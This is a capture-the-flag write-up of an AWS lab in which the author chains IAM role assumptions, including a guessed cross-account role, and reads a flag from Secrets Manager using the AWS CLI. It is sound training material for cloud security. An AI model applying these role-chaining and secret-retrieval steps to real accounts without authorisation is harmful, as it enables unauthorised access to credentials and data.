You’ve just gained access to the reinier role. Utilize cloudfox and see where it takes you!
First things first, set up the profile, and test access.
1
2
3
4
5
6
7
8
9
10
11
12
13
| adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile reinier]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/reinier
source_profile = cloudfoxable
adicpnn@laboratory cloud % aws sts get-caller-identity --profile reinier
{
"UserId": "AROAR4HCPRIDTDEJTABUR:botocore-session-1773311810",
"Account": "129323993607",
"Arn": "arn:aws:sts::129323993607:assumed-role/reinier/botocore-session-1773311810"
}
|
Then, enumerating attached policies.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name reinier --profile cloudfoxable
{
"AttachedPolicies": [
{
"PolicyName": "authorized_deployers",
"PolicyArn": "arn:aws:iam::129323993607:policy/authorized_deployers"
},
{
"PolicyName": "SecurityAudit",
"PolicyArn": "arn:aws:iam::aws:policy/SecurityAudit"
}
]
}
adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/authorized_deployers --version-id v1 --profile cloudfoxable
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"sts:AssumeRole"
],
"Effect": "Allow",
"Resource": [
"arn:aws:iam::129323993607:role/deployment_automation",
"arn:aws:iam::992382614597:role/*"
]
},
{
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::deployment-automation-qsf7i",
"arn:aws:s3:::deployment-automation-qsf7i/*"
]
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2026-03-11T15:44:09+00:00"
}
}
|
Interesting, the customer managed policy attached to this role grants quite a few things:
- AssumeRole permissions to a role in my account, and to all roles in another account
- S3 permissions to list a bucket and view it’s contents
I’ll start with enumerating the S3 bucket first.
1
2
3
4
5
6
7
| adicpnn@laboratory cloud % aws s3 ls deployment-automation-qsf7i
2026-03-11 16:44:09 141627 Deployment Process Description.pdf
2026-03-11 16:44:08 135541 Security Review Process.pdf
adicpnn@laboratory cloud % aws s3 sync s3://deployment-automation-qsf7i .
download: s3://deployment-automation-qsf7i/Security Review Process.pdf to ./Security Review Process.pdf
download: s3://deployment-automation-qsf7i/Deployment Process Description.pdf to ./Deployment Process Description.pdf
|
Found two pdf files in here:
- Security Review Process.pdf
- One bad, one good samples of SQL statements :)
- Deployment Process Description.pdf
- Lists information on different stages of deployment environments, and what procedures are in place to get code from dev, to staging, to prod.
This gives me some ideas to think about, but for now I’ll continue looking into the roles I can assume.
1
2
3
4
5
6
7
8
9
10
11
12
13
| adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile deployment]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/deployment_automation
source_profile = reinier
adicpnn@laboratory cloud % aws sts get-caller-identity --profile deployment
{
"UserId": "AROAR4HCPRID5C7MBZKHG:botocore-session-1773312746",
"Account": "129323993607",
"Arn": "arn:aws:sts::129323993607:assumed-role/deployment_automation/botocore-session-1773312746"
}
|
And find it’s permissions.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name deployment_automation --profile cloudfoxable
{
"AttachedPolicies": [
{
"PolicyName": "deployment_automation",
"PolicyArn": "arn:aws:iam::129323993607:policy/deployment_automation"
}
]
}
adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/deployment_automation --version-id v1 --profile cloudfoxable
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"sts:AssumeRole"
],
"Effect": "Allow",
"Resource": "arn:aws:iam::129323993607:role/secret_reader"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2026-03-11T15:44:09+00:00"
}
}
|
Another role!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile sreader]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/secret_reader
source_profile = deployment
adicpnn@laboratory cloud % aws sts get-caller-identity --profile sreader
{
"UserId": "AROAR4HCPRIDRDETOLKD7:botocore-session-1773318844",
"Account": "129323993607",
"Arn": "arn:aws:sts::129323993607:assumed-role/secret_reader/botocore-session-1773318844"
}
adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name secret_reader --profile cloudfoxable
{
"AttachedPolicies": [
{
"PolicyName": "secret_reader",
"PolicyArn": "arn:aws:iam::129323993607:policy/secret_reader"
}
]
}
adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/secret_reader --version-id v1 --profile cloudfoxable
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"secretsmanager:ListSecrets"
],
"Effect": "Allow",
"Resource": "*"
},
{
"Action": [
"secretsmanager:GetSecretValue"
],
"Effect": "Allow",
"Resource": "arn:aws:secretsmanager:eu-central-1:129323993607:secret:SegueFlag-NkRElx"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2026-03-11T15:43:58+00:00"
}
}
|
Ok then, so I should be able to read the flag now, great.
1
2
3
4
5
6
7
8
9
10
11
| adicpnn@laboratory cloud % aws secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:eu-central-1:129323993607:secret:SegueFlag-NkRElx --profile sreader
{
"ARN": "arn:aws:secretsmanager:eu-central-1:129323993607:secret:SegueFlag-NkRElx",
"Name": "SegueFlag",
"VersionId": "terraform-20260311154358616400000006",
"SecretString": "Thank you, but your flag is in another castle",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2026-03-11T16:43:58.647000+01:00"
}
|
The flag is not here? Maybe this is what the documents in the S3 bucket were referring to. A safe assumption would be that these 2 accounts represent mirrored environments, one for staging, one for production. Based on this, there should be an identical “deployment_automation” role in the other account.
1
2
3
4
5
6
7
8
9
10
11
| [profile external_deployment]
region = eu-central-1
role_arn = arn:aws:iam::992382614597:role/deployment_automation
source_profile = reinier
adicpnn@laboratory cloud % aws sts get-caller-identity --profile external_deployment
{
"UserId": "AROA6ODU47RCSYM7JNVB4:botocore-session-1773319202",
"Account": "992382614597",
"Arn": "arn:aws:sts::992382614597:assumed-role/deployment_automation/botocore-session-1773319202"
}
|
The assumption was right indeed, maybe these again a secret_reader role assumable? This time I won’t have a SecurityAudit managed policy attached to gather more info, so I need to blindly try and assume this role.
1
2
3
4
5
6
7
8
9
10
11
12
13
| adicpnn@laboratory cloud % aws sts assume-role --role-arn arn:aws:iam::992382614597:role/secret_reader --role-session-name secret --profile external_deployment
{
"Credentials": {
"AccessKeyId": "nope",
"SecretAccessKey": "nope",
"SessionToken": "nope",
"Expiration": "2026-03-12T13:42:32+00:00"
},
"AssumedRoleUser": {
"AssumedRoleId": "AROA6ODU47RCW5NAHFAUT:secret",
"Arn": "arn:aws:sts::992382614597:assumed-role/secret_reader/secret"
}
}
|
Indeed there is! We have almost all the information we need, excluding two caveats:
- The secret might be in a different region, so I need to account for that
- I will assume the secret is hosted in the same region as the default cloudfoxable one: us-west-2
- I don’t know the full ARN of this secret
Quoting AWS documentation, Secrets Manager includes six random characters at the end of the secret name to help ensure that the secret ARN is unique.
Secrets Manager includes six random characters at the end of the secret name to help ensure that the secret ARN is unique. If the original secret is deleted, and then a new secret is created with the same name, the two secrets have different ARNs because of these characters. Users with access to the old secret don’t automatically get access to the new secret because the ARNs are different.
Secrets Manager constructs an ARN for a secret with Region, account, secret name, and then a hyphen and six more characters, as follows: arn:aws:secretsmanager:us-east-2:111122223333:secret:SecretName-abcdef
What this means, is that I need to attempt retrieving the secret using it’s partial name, excluding the trialing hyphen and characters.
I’ll prepare the aws profile before attempting to read the secret.
1
2
3
4
5
6
7
8
9
10
11
12
13
| adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile external_secret]
region = eu-central-1
role_arn = arn:aws:iam::992382614597:role/secret_reader
source_profile = external_deployment
adicpnn@laboratory cloud % aws sts get-caller-identity --profile external_secret
{
"UserId": "AROA6ODU47RCW5NAHFAUT:botocore-session-1773319905",
"Account": "992382614597",
"Arn": "arn:aws:sts::992382614597:assumed-role/secret_reader/botocore-session-1773319905"
}
|
Execution#
All that’s left now is to get the flag!
1
2
3
4
5
6
7
8
9
10
11
| adicpnn@laboratory cloud % aws secretsmanager get-secret-value --region us-west-2 --secret-id SegueFlag --profile external_secret
{
"ARN": "arn:aws:secretsmanager:us-west-2:992382614597:secret:SegueFlag-9Jlveb",
"Name": "SegueFlag",
"VersionId": "b60d8f60-e18b-4dff-b520-fe88d8a924ea",
"SecretString": "{\"SegueFlag\":\"FLAG{SEGUE:protect_roles_from_unintended_cross_account_access}\"}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2024-04-26T19:43:23.342000+02:00"
}
|